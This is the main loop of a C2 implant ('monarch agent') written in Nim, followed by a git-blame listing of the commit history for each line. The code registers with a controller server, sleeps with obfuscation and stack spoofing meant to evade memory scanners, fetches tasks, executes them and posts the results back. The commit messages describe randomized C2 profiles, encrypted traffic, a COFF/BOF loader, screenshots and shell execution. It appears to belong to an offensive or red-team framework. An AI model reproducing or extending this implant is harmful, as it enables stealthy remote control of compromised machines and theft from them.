src/agent/main.nim

import strformat, os, times, system, base64

import core/[http, context, sleepmask]
import protocol/[task, result, heartbeat, registration]
import ../common/[types, utils, crypto]

proc main() = 

    # Initialize agent context
    var ctx = AgentCtx.init()
    if ctx == nil: 
        quit(0)

    # Create registration payload
    var registration: AgentRegistrationData = ctx.collectAgentMetadata()
    let registrationBytes = ctx.serializeRegistrationData(registration)

    if not ctx.httpPost(registrationBytes): 
        echo "[-] Agent registration failed."
        quit(0)
    echo fmt"[+] [{ctx.agentId}] Agent registered."

    #[
        Agent routine: 
        1. Sleep Obfuscation
        2. Retrieve task from /tasks endpoint
        3. Execute task and post result to /results
        4. If additional tasks have been fetched, go to 2.
        5. If no more tasks need to be executed, go to 1. 
    ]#
    while true: 
        # Sleep obfuscation to evade memory scanners
        sleepObfuscate(ctx.sleep * 1000, ctx.sleepTechnique, ctx.spoofStack)

        let date: string = now().format("dd-MM-yyyy HH:mm:ss")
        echo "\n", fmt"[*] [{date}] Checking in."

        try: 
            # Retrieve task queue for the current agent by sending a check-in/heartbeat request
            # The check-in request contains the agentId, listenerId, so the server knows which tasks to return
            var heartbeat: Heartbeat = ctx.createHeartbeat()
            let 
                heartbeatBytes: seq[byte] = ctx.serializeHeartbeat(heartbeat)
                packet: string = ctx.httpGet(heartbeatBytes)

            if packet.len <= 0: 
                echo "[*] No tasks to execute."
                continue

            let tasks: seq[Task] = ctx.deserializePacket(packet)
            
            if tasks.len <= 0: 
                echo "[*] No tasks to execute."
                continue

            # Execute all retrieved tasks and return their output to the server
            for task in tasks: 
                var result: TaskResult = ctx.handleTask(task)
                let resultBytes: seq[byte] = ctx.serializeTaskResult(result)

                ctx.httpPost(resultBytes)

        except CatchableError as err: 
            echo "[-] ", err.msg

when isMainModule:
    main()
Implemented ECDH key exchange using ed25519 to share a symmetric AES key without transmitting it over the network. 2025-07-24 15:31:46 +02:00			`import strformat, os, times, system, base64`
Added monarch agent 2025-05-19 21:56:34 +02:00
Reworked module system. Modules can now be individually set to be included in the agent. For example, it is possible to compile an agent only capable of executing BOFs and nothing else. 2025-09-17 15:55:13 +02:00			`import core/[http, context, sleepmask]`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`import protocol/[task, result, heartbeat, registration]`
Rework module system. Now modules/commands are defined in a single file each, with both the function executed by teh agent and the definition for server-side argument parsing. 2025-07-25 16:41:29 +02:00			`import ../common/[types, utils, crypto]`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`proc main() =`

Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`# Initialize agent context`
			`var ctx = AgentCtx.init()`
			`if ctx == nil:`
Agent utilizes configuration file (nim.cfg) and compile-time variables for listener information. 2025-05-24 13:56:26 +02:00			`quit(0)`

Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`# Create registration payload`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`var registration: AgentRegistrationData = ctx.collectAgentMetadata()`
			`let registrationBytes = ctx.serializeRegistrationData(registration)`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`if not ctx.httpPost(registrationBytes):`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`echo "[-] Agent registration failed."`
			`quit(0)`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`echo fmt"[+] [{ctx.agentId}] Agent registered."`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`#[`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`Agent routine:`
Added monarch agent 2025-05-19 21:56:34 +02:00			`1. Sleep Obfuscation`
			`2. Retrieve task from /tasks endpoint`
			`3. Execute task and post result to /results`
			`4. If additional tasks have been fetched, go to 2.`
			`5. If no more tasks need to be executed, go to 1.`
			`]#`
			`while true:`
Integrated sleep obfuscation settings into agent generation. 2025-09-04 13:44:50 +02:00			`# Sleep obfuscation to evade memory scanners`
			`sleepObfuscate(ctx.sleep * 1000, ctx.sleepTechnique, ctx.spoofStack)`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`let date: string = now().format("dd-MM-yyyy HH:mm:ss")`
Decided against implementing additional heap obfuscation for Ekko, due to no sensitive data being allocated in heap memory. 2025-08-28 12:47:37 +02:00			`echo "\n", fmt"[*] [{date}] Checking in."`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`try:`
			`# Retrieve task queue for the current agent by sending a check-in/heartbeat request`
			`# The check-in request contains the agentId, listenerId, so the server knows which tasks to return`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`var heartbeat: Heartbeat = ctx.createHeartbeat()`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`let`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`heartbeatBytes: seq[byte] = ctx.serializeHeartbeat(heartbeat)`
			`packet: string = ctx.httpGet(heartbeatBytes)`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`if packet.len <= 0:`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`echo "[*] No tasks to execute."`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`continue`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`let tasks: seq[Task] = ctx.deserializePacket(packet)`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00
			`if tasks.len <= 0:`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`echo "[*] No tasks to execute."`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`continue`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`# Execute all retrieved tasks and return their output to the server`
			`for task in tasks:`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`var result: TaskResult = ctx.handleTask(task)`
			`let resultBytes: seq[byte] = ctx.serializeTaskResult(result)`
Implemented communication with custom binary structure instead of JSON requests 2025-07-19 16:49:27 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`ctx.httpPost(resultBytes)`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00
			`except CatchableError as err:`
			`echo "[-] ", err.msg`
Implemented 'screenshot' command. 2025-09-03 19:38:22 +02:00
Implemented COFF loader. 2025-08-28 19:00:34 +02:00			`when isMainModule:`
Added monarch agent 2025-05-19 21:56:34 +02:00			`main()`